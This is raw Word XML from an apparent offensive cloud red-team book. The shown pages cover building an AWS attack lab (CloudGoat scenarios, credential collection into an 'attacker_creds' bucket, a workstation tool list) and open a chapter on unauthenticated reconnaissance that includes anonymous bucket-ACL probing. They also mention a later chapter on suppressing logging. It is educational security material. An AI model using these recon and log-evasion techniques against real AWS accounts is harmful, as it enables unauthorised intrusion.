          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>wJalrEXAMPLEKEY/8J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D7590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operator@kali:~/labs$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws configure --profile cgkitten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357FE8C4"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operator@kali:~/labs$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws sts get-caller-identity --profile cgkitten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0711850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4628ADD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"UserId": "AIDAEXAMPLECGKITTEN",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A0E9B8"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"Account": "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>555566667777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3532F39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"Arn": "arn:aws:iam::555566667777:user/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cg-kittens-cgid-kittens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB6AC3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40FA5A3B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>3.6  Terraform harness for rapid teardown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F645A9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entire Victim OU is treated as cattle: destroy and redeploy in under five minutes between test runs. Keep a root Terraform module in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lab/victims/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> that loops over CloudGoat scenarios, records their output access keys into a shared S3 bucket in the attacker account, and emits the credentials into the operator's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~/.aws/credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with distinctive profile names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F3D51B"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module "scenarios" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5043318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source        = "./modules/cloudgoat"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCF847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for_each      = toset([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0018EE0C"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"iam_privesc_by_attachment",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5770F3A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"iam_privesc_by_rollback",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2340882B"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"cloud_breach_s3",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB49EB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"ec2_ssrf",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15394B5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"rce_web_app"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520CFEE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579B049C"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scenario      = each.value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710CACB6"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output_bucket = aws_s3_bucket.attacker_creds.bucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4AAC5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61C35B80" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>3.7  Logging and visibility on the victim side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9A370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lab is only useful if you can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>see</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> what happened after an attack. Configure on every victim account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3E1F93" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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A multi-region CloudTrail logging to the org logging-archive bucket. Include management events </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> S3 data events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734E12EE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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GuardDuty turned on, org-wide, with findings replicated to Security Hub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15392E13" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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VPC Flow Logs on every VPC (at least the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> VPC and any explicitly created ones).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA93AE2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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AWS Config recorder with the operator-managed rules pack; forward to Security Hub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7044E1D7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Detective enabled to aggregate the above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D98EAF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In Chapter 20 you will write Athena queries against the org trail; in Chapter 16 you will practice suppressing that very logging pipeline. You need to see both sides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7AFB4C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="158007503"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CAUTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0745DD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="158007503"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Do not, under any circumstances, attach the payer (management) account to the Victim OU or give an engagement-test role any access to it. A technique in Chapter 9 involves </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OrganizationAccountAccessRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> chaining; that primitive, mis-targeted, can hijack the management account and you will be recovering from it for days. Isolate the payer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750FEC0D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>3.8  A minimum workstation build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDF947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operator's local toolchain — installed on a Kali or Ubuntu host — needs only:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624FD99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pipx install pacu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5A9A5F"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pipx install awscli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE0EA4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pipx install scoutsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11898A3B"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pipx install prowler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6488AF61"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pipx install principalmapper          # PMapper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABD140C"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brew install --cask cloudfox          # or go build from source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B6FB34"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go install github.com/DataDog/stratus-red-team/v2/cmd/stratus@latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CFFAD7"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go install github.com/trufflesecurity/trufflehog/v3@latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D6FB2B"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go install github.com/gitleaks/gitleaks/v8@latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536EA49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pipx install cloudgoat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AC49EF"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curl -LO https://github.com/iann0036/iam-vulnerable/archive/refs/heads/main.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9D27F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With these installed, every technique in the book is runnable against the lab in minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A124BBF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF0E09C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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three-OU Organization (Security, Victim, Attacker) is the minimum useful lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E5B509" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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SCPs at the root keep destructive primitives contained and out-of-scope regions closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385EF77B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Budgets and a janitor Lambda prevent abandoned detonations from running up bills.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E490207" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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CloudTrail on both sides — attacker and victim — means you see the techniques from both ends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DF7FF0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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CloudGoat, IAM Vulnerable, AWSGoat, and TerraGoat cover virtually every technique later in the book. Deploy them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363BF946" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="896741491"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Part Two</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D6B92A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="2304" w:after="0"/>
        <w:divId w:val="1377122074"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Reconnaissance and Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098A45B8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="part-blurb"/>
        <w:divId w:val="1377122074"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>You cannot attack what you cannot see, and you cannot act on what you do not have credentials for. Part II covers the two pre-entry phases: unauthenticated discovery of an AWS footprint, the authenticated enumeration that happens the moment you land a first set of keys, and the six primary classes of initial access that keep red teams fed in 2026.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A165EF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="1844583565"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Reconnaissance and Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D03D3F"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Unauthenticated Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CA4EF1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:spacing w:before="240" w:after="48"/>
        <w:outlineLvl w:val="4"/>
        <w:divId w:val="1633251739"/>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314317BF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="1633251739"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Methodically map an AWS footprint without any valid credentials. Attribute an account ID from public artifacts, enumerate principals by probing error responses, identify exposed services through public registries, and chart DNS/CDN infrastructure that hints at the account's real architecture. End with a workflow you can run against any target in under an hour.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F2BA97" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="lead"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>External recon in AWS is mostly a game of leveraging the provider's own namespaces against it. S3 bucket names, EC2 AMI IDs, RDS snapshot IDs, CloudFront distributions, Lambda function URLs, and IAM role names all leak — through search engines, through public listings, through error messages that pretend to be anonymous but disclose structural data about the account. An experienced cloud red-teamer can fingerprint an AWS tenant from the outside almost as accurately as one inside it. This chapter teaches tha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>t fingerprinting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BED16FE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>4.1  Attribution — getting from domain to account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519818A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first attack-surface question is always the same: which AWS account number is behind this target? Knowing the 12-digit account ID unlocks half of the subsequent techniques, because account ID is used as a resource-policy condition, an ARN field, and a SAML provider identifier throughout the platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F71E7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Five primary leaks attribute an AWS account to a customer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D591DA9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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S3 bucket ACL response.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Public buckets return their owner's canonical user ID, which (when combined with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws s3api list-buckets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> in your own account) maps back to an account number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3D974" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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S3 redirect from CloudFront.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Many CloudFront distributions point at S3 origins whose bucket name follows a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>&lt;company&gt;-assets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern, giving you a known-good bucket to probe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7049F0C2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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SNS/SQS/Lambda ARN leakage.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Public webhook URLs, error responses that include a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> ARN, and documentation examples all carry the account number in cleartext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA63677" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Public AMI and snapshot metadata.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An AMI or EBS snapshot shared with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> discloses its owning account in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws ec2 describe-images</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068453F7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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SES, IoT, and MediaConnect MX/CNAME patterns.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS records with AWS-specific patterns can be attributed to a small set of possible accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D95F151"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s3api get-bucket-acl --bucket acme-corp-public-assets --no-sign-request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5767F3"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603B9F9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"Owner": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A66DE5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"DisplayName": "aws-prod-billing",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076C9211"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"ID": "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>7f83b1657ff1fc53b92dc18148a1d65dfc2d4b1fa3d677284addd200126d9069</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
